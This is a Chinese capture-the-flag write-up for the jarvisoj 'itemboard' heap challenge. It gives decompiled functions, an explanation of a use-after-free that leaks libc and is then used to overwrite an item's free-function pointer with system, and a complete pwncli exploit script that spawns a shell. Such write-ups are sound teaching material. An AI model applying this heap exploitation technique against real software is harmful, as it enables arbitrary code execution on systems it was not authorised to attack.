jarvisoj_itemboard

itemboard

逆向分析

ADD:

void __cdecl new_item()
{
  int v0; // eax
  char buf[1024]; // [rsp+0h] [rbp-410h] BYREF
  int content_len; // [rsp+404h] [rbp-Ch]
  Item *item; // [rsp+408h] [rbp-8h]

  item = (Item *)malloc(0x18uLL);
  v0 = items_cnt++;
  item_array[v0] = item;
  item->name = (char *)malloc(0x20uLL);
  item->free = (void (*)(ItemStruct *))item_free;
  puts("New Item");
  puts("Item name?");
  fflush(stdout);
  read_until(0, buf, 32, 10);
  strcpy(item->name, buf);
  puts("Description's len?");
  fflush(stdout);
  content_len = read_num();
  item->description = (char *)malloc(content_len);
  puts("Description?");
  fflush(stdout);
  read_until(0, buf, content_len, 10);
  strcpy(item->description, buf);
  puts("Add Item Successfully!");
}

可以看出每次创建两个chunk,如下图:

image-20220912231356764

其中,description_chunk_prt的size大小是我们可控的

点击item_free,可以看到

void __cdecl item_free(Item *item)
{
  free(item->name);
  free(item->description);
  free(item);
}

以及看整个程序逻辑可以看出这个是remove_item的关键,而且没有进行 item_array[idx] = 0 的操作。

漏洞利用

存在UAF,我们可以利用UAF来leak libc.address ,然后利用堆风水将item_free替换为system。

堆风水

函数指针存在于每次申请的第一个0x18大小的chunk,我们申请一次用来leak,第二次申请的时候随便申请。我们free掉这两次申请的所有chunk,会发现存在函数指针的chunk皆为0x18,如下图:

image-20220912231024642

而且item_array[0],[1]记录着这两个chunk,我们可以进行add('a' * 16, 0x18, '/bin/sh;aaaaaaaa' + p64(system_addr)),将0x4c这个chunk当成idx 3的chunk的description_chunk,此时 item_array[0].item_free = item_array[3].description,与此同时item_array[3].description,即item_array[0].item_free,中的函数指针被修改为system,然后free(0),完成getshell

EXP

#!/usr/bin/env python3
'''
Author: 7resp4ss
Date: 2022-09-12 19:34:48
LastEditTime: 2022-09-12 22:40:02
Description: 
'''
from pwncli import *

cli_script()
io = gift['io']
elf = gift['elf']
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc-2.23.so")
    gift['libc'] = libc

def add(name, length, desc):
    io.sendlineafter("choose:", "1")
    io.sendlineafter("Item name?\n", name)
    io.sendlineafter("Description's len?\n", str(length))
    io.sendlineafter("Description?\n", desc)


def show(idx):
    io.sendlineafter("choose:", "3")
    io.sendlineafter("Which item?\n", str(idx))

def delete(idx):
    io.sendlineafter("choose:", "4")
    io.sendlineafter("Which item?\n", str(idx))

add('aaaa', 0x80, 'bbbb')
add('dddd', 0x20, 'aaaa')
delete(0)
show(0)
malloc_hook = recv_current_libc_addr(88+0x10) #leak_address - 88 - 0x10
log_address_ex2(malloc_hook)
lb = set_current_libc_base_and_log(malloc_hook,'__malloc_hook')
system_addr = libc.sym['system']
log_address_ex2(system_addr)
delete(1)
add('a' * 16, 24, '/bin/sh;aaaaaaaa' + p64(system_addr))
delete(0)

io.interactive()

 ./exp.py de ./itemboard -b base+0xb0e -u
posted @ 2022-09-12 23:24  7resp4ss  阅读(44)  评论(0编辑  收藏  举报